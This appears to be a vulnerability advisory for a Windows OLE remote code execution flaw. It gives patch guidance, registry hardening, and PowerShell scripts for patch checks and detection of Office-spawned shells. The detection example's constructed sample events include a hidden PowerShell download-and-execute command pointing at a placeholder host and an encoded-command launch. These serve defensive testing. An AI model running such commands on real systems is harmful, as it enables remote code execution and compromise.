CVE-2024-21372
📋 TL;DR
This vulnerability (Windows OLE Remote Code Execution) allows a remote attacker to execute arbitrary code on affected Windows systems through malicious OLE objects. The code runs in the context of the user who opened the content, so exploitation requires user interaction: the victim must open an untrusted document or visit a malicious website that delivers the crafted OLE content.
💻 Affected Systems
- Microsoft Windows
📦 What is this software?
Windows 10 1507 by Microsoft
Windows 10 1607 by Microsoft
Windows 10 1809 by Microsoft
Windows 10 21H2 by Microsoft
Windows 10 22H2 by Microsoft
Windows 11 21H2 by Microsoft
Windows 11 22H2 by Microsoft
Windows 11 23H2 by Microsoft
⚠️ Risk & Real-World Impact
Worst Case
Arbitrary code runs with the privileges of the user who opened the content; if that user is a local administrator, this means full system compromise, data exfiltration, ransomware deployment and lateral movement across the network.
Likely Case
Malware installation, credential theft, and persistence establishment on individual workstations.
If Mitigated
Limited impact due to application sandboxing, reduced privileges, and network segmentation.
🎯 Exploit Status
Exploitation requires user interaction (opening a malicious document or visiting a malicious site); the attacker cannot trigger it without the victim's action. No public exploit code was available at the time of writing; re-check the vendor advisory and public exploit trackers before relying on that.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: February 2024 security updates
Vendor Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21372
Restart Required: Yes
Instructions:
1. Apply the February 2024 Windows security updates via Windows Update.
2. For enterprise environments, deploy the updates through WSUS or Configuration Manager (SCCM).
3. Restart systems after patch installation.
🔧 Temporary Workarounds
Block activation of OLE Package objects in Office
Reduces the attack surface for embedded OLE packages delivered in documents; this is defense in depth, not a vendor-confirmed fix for this CVE
reg add "HKCU\Software\Microsoft\Office\16.0\Word\Security" /v PackagerPrompt /t REG_DWORD /d 2 /f
reg add "HKCU\Software\Microsoft\Office\16.0\Excel\Security" /v PackagerPrompt /t REG_DWORD /d 2 /f
reg add "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security" /v PackagerPrompt /t REG_DWORD /d 2 /f
PackagerPrompt 2 blocks activation, 1 prompts (the default) and 0 activates silently; 16.0 is the hive for Office 2016 and later, including Microsoft 365 Apps. To enforce the setting by Group Policy, write the same value under HKCU\Software\Policies\Microsoft\Office\16.0\<App>\Security. Do not try to harden a host by adding extensions to the Attachment Manager value LowRiskFileTypes under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations: file types listed there bypass the open-file security warning, so putting .exe, .js or .hta in that list weakens the system rather than protecting it.
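The following PowerShell script is an added example, not part of the original advisory and not Microsoft's code. It applies the PackagerPrompt hardening above across a list of Office applications and versions, reads the value back so the change is verifiable, and optionally enables the Microsoft Defender attack surface reduction rule that stops Office applications from spawning child processes. The Office version and application lists are assumptions; adjust them to what is deployed, and run ASR rules in audit mode first in production.

```powershell
# Added example (not from the original advisory or from Microsoft): block OLE
# Package activation in Office for the current user and, optionally, enable the
# Defender ASR rule "Block all Office applications from creating child processes".
# Office versions/apps below are assumptions; adjust to the deployed environment.

param(
    [string[]]$OfficeVersions = @('16.0'),               # 16.0 = Office 2016/2019/2021/Microsoft 365
    [string[]]$Apps = @('Word', 'Excel', 'PowerPoint'),  # registry key names under Office\<ver>\
    [switch]$EnableAsrRule
)

# PackagerPrompt: 0 = activate silently, 1 = prompt (default), 2 = block activation.
function Set-PackagerPrompt {
    param(
        [Parameter(Mandatory)][string]$Version,
        [Parameter(Mandatory)][string]$App,
        [int]$Value = 2
    )
    $key = "HKCU:\Software\Microsoft\Office\$Version\$App\Security"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name PackagerPrompt -PropertyType DWord -Value $Value -Force | Out-Null
    # Read the value back so the caller sees what is actually in the registry.
    [pscustomobject]@{
        Key            = $key
        PackagerPrompt = (Get-ItemProperty -Path $key -Name PackagerPrompt).PackagerPrompt
    }
}

$results = foreach ($v in $OfficeVersions) {
    foreach ($a in $Apps) { Set-PackagerPrompt -Version $v -App $a }
}
$results | Format-Table -AutoSize

if ($EnableAsrRule) {
    # Defender ASR rule: Block all Office applications from creating child processes.
    # Use -AttackSurfaceReductionRules_Actions AuditMode first to see what would be blocked.
    $ruleId = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'
    Add-MpPreference -AttackSurfaceReductionRules_Ids $ruleId -AttackSurfaceReductionRules_Actions Enabled
    # Confirm the rule is now listed.
    (Get-MpPreference).AttackSurfaceReductionRules_Ids
}
```

Because PackagerPrompt lives under HKCU, the script must run in each user's context (logon script or Intune/GPO preference); for a machine-wide, non-overridable setting use the Policies path noted above. The ASR rule blocks the most common post-exploitation step (Office launching cmd.exe, PowerShell or a script host) regardless of which OLE bug was used, which is why it is worth enabling even after patching.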
🧯 If You Can't Patch
- Implement application whitelisting to prevent unauthorized executables
- Use network segmentation to isolate vulnerable systems and restrict lateral movement
🔍 How to Verify
Check if Vulnerable:
Check whether the February 2024 cumulative update, or any later cumulative update (which supersedes it), is installed. Because a later cumulative update replaces the February one, searching for a single KB number gives false negatives on hosts patched later; compare the OS build and update build revision (UBR) instead.
Check Version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR
systeminfo reports the major build (for example 22631) but not the revision; the UBR value is the revision shown after the dot in winver, and it is what tells you whether a given month's cumulative update is present.
Verify Fix Applied:
Verify that the February 2024 cumulative update for the host's build is installed, for example KB5034765 on Windows 11 22H2/23H2. The KB number differs per Windows version (the MSRC advisory lists the KB for each build), and any later cumulative update also contains the fix, so Get-HotFix may no longer show the February KB on an up-to-date host.
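The script below is an added example (not from the original advisory or from Microsoft). It decides whether a host carries the February 2024 cumulative update by comparing its build number and UBR against the minimum revision for that build, which keeps working after later cumulative updates supersede the February KB. The build-to-UBR table is an assumption that should be confirmed against the MSRC advisory and the release notes for the KBs it names; builds missing from the table are reported as Unknown rather than guessed.

```powershell
# Added example (not from the original advisory): build/UBR based patch check.
# The $MinimumUbr table is an assumption to confirm against the MSRC advisory;
# builds not listed are reported as 'Unknown'.

function Get-WindowsBuildInfo {
    $cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    [pscustomobject]@{
        ProductName    = $cv.ProductName
        DisplayVersion = $cv.DisplayVersion        # e.g. 22H2 (absent on very old builds)
        Build          = [int]$cv.CurrentBuildNumber
        Ubr            = [int]$cv.UBR               # update build revision, e.g. 3155
    }
}

function Test-Feb2024UpdateInstalled {
    param(
        [Parameter(Mandatory)][int]$Build,
        [Parameter(Mandatory)][int]$Ubr,
        # Minimum UBR that includes the February 2024 cumulative update (assumed values).
        [hashtable]$MinimumUbr = @{
            19044 = 4046   # Windows 10 21H2, KB5034763
            19045 = 4046   # Windows 10 22H2, KB5034763
            22621 = 3155   # Windows 11 22H2, KB5034765
            22631 = 3155   # Windows 11 23H2, KB5034765
        }
    )
    if (-not $MinimumUbr.ContainsKey($Build)) {
        return [pscustomobject]@{ Build = $Build; Ubr = $Ubr; Required = $null; Status = 'Unknown' }
    }
    $status = if ($Ubr -ge $MinimumUbr[$Build]) { 'Patched' } else { 'Vulnerable' }
    [pscustomobject]@{ Build = $Build; Ubr = $Ubr; Required = $MinimumUbr[$Build]; Status = $status }
}

$info = Get-WindowsBuildInfo
$info
Test-Feb2024UpdateInstalled -Build $info.Build -Ubr $info.Ubr

# Cross-check: the most recent security updates Windows reports as installed.
Get-HotFix |
    Where-Object Description -eq 'Security Update' |
    Sort-Object InstalledOn -Descending |
    Select-Object -First 5 HotFixID, InstalledOn
```

Run it with Invoke-Command -ComputerName across a fleet to get one Status row per host; an Unknown result means the build (for example Windows 10 1809 or Server builds) is not in the table, not that the host is safe, so extend the table from the advisory before trusting the output.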
📡 Detection & Monitoring
Log Indicators:
- Windows writes no dedicated event for OLE object activation, so rely on process-creation auditing: Security event 4688 with command-line logging enabled, or Sysmon event 1
- Script hosts and shells (cmd.exe, powershell.exe, wscript.exe, mshta.exe, rundll32.exe) spawned by Office applications or by the COM/OLE surrogate host dllhost.exe
- Unusual document access patterns, such as documents opened from Downloads, Temp or the Outlook attachment cache immediately before such a process start
Network Indicators:
- Outbound connections from Office applications to unusual destinations, or from shells they spawned
- DNS queries for newly registered or low-reputation domains originating from document-handling processes
SIEM Query:
source="windows" event_id=4688 (process_name="cmd.exe" OR process_name="powershell.exe") (parent_process_name="*office*" OR parent_process_name="*ole*")
The parentheses matter: implicit AND binds tighter than OR in Splunk-style search, so without them the query returns every cmd.exe launch on the estate. Field names vary by SIEM (Splunk's Windows add-on uses New_Process_Name and Creator_Process_Name, Sysmon uses Image and ParentImage); the "*office*" pattern relies on the parent field holding the full path, which for Office binaries contains "Microsoft Office".
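The SIEM query above expressed as a PowerShell filter, as an added example that is not part of the original advisory. It runs over constructed sample events (not real telemetry) so the logic can be checked offline; the field names mirror Security event 4688, and the comment shows how to feed it live events instead. The parent and child process lists are assumptions chosen to match the indicators above.

```powershell
# Added example (not from the original advisory): detect shells and script hosts
# spawned by Office or by the OLE surrogate host. Sample events are constructed.
# For live data replace $sample with objects built from
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688}
# using the event's NewProcessName, ParentProcessName and CommandLine fields.

$childOfInterest = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe',
                     'cscript.exe', 'mshta.exe', 'rundll32.exe')
$officeParents   = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe')
$oleParents      = @('dllhost.exe')   # COM/OLE surrogate; noisy, tune per environment

function Test-SuspiciousOleChild {
    param([Parameter(ValueFromPipeline)]$Event)
    process {
        # Compare on the executable name only; 4688 stores full paths.
        $child  = [IO.Path]::GetFileName($Event.NewProcessName).ToLowerInvariant()
        $parent = [IO.Path]::GetFileName($Event.ParentProcessName).ToLowerInvariant()
        if (($childOfInterest -contains $child) -and
            (($officeParents -contains $parent) -or ($oleParents -contains $parent))) {
            [pscustomobject]@{
                Time    = $Event.TimeCreated
                Parent  = $parent
                Child   = $child
                Command = $Event.CommandLine
            }
        }
    }
}

# Constructed sample events (not real telemetry). Two should match, two should not.
$sample = @(
    [pscustomobject]@{ TimeCreated = '2024-02-14T09:01:10'
        NewProcessName    = 'C:\Windows\System32\cmd.exe'
        ParentProcessName = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine       = 'cmd.exe /c powershell -w hidden -nop -c "iwr http://example.invalid/a.ps1 | iex"' },
    [pscustomobject]@{ TimeCreated = '2024-02-14T09:01:12'
        NewProcessName    = 'C:\Windows\System32\notepad.exe'
        ParentProcessName = 'C:\Windows\explorer.exe'
        CommandLine       = 'notepad.exe' },
    [pscustomobject]@{ TimeCreated = '2024-02-14T09:02:00'
        NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentProcessName = 'C:\Windows\System32\dllhost.exe'
        CommandLine       = 'powershell.exe -w hidden -enc SQBFAFgA' },
    [pscustomobject]@{ TimeCreated = '2024-02-14T09:03:00'
        NewProcessName    = 'C:\Windows\System32\cmd.exe'
        ParentProcessName = 'C:\Windows\explorer.exe'
        CommandLine       = 'cmd.exe' }
)

$hits = @($sample | Test-SuspiciousOleChild)
$hits | Format-Table -AutoSize
"$($hits.Count) suspicious process creations"   # expected: 2 (WINWORD->cmd, dllhost->powershell)
```

Matching on the executable name rather than a "*office*" wildcard avoids both false positives from unrelated paths that happen to contain "office" and false negatives when Office is installed to a non-default directory. The dllhost.exe parent is included because the OLE surrogate hosts out-of-process objects, but it also hosts many legitimate COM servers, so expect to add exclusions for known-good command lines before alerting on it.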